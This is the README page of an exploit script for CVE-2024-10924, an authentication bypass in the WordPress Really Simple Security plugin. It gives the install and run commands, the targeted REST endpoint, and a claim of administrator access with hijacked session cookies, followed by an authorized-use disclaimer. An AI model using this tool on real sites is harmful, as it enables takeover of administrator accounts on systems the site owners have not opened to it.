
Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 - 9.1.1.1 - Authentication Bypass
Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 - 9.1.1.1 - Authentication Bypass
This script exploits a vulnerability in the Really Simple Security plugin (versions 9.0.0 - 9.1.1.1) for WordPress.The flaw allows authentication bypass due to improper error handling in the check_login_and_get_user function in the Two-Factor Authentication API.
Using this exploit, an attacker can log in as any user (e.g., administrator) if 2FA is enabled.Once authenticated, the script automatically launches a browser session with the obtained session cookies.
Before running the script, install the required dependencies:
pip install requests selenium webdriver-manager
python CVE-2024-10924.py -u http://TARGET-WEBSITE.com/
/wp-json/reallysimplessl/v1/two_fa/skip_onboarding
/wp-admin/, granting administrator access without needing a password.usage: CVE-2024-10924.py [-h] -u URL
WordPress Login Exploit | Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 - 9.1.1.1 - Authentication
Bypass
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL
This script is intended for educational purposes and authorized security assessments only. Misuse of this script may result in legal consequences. Always obtain proper authorization before testing on any system.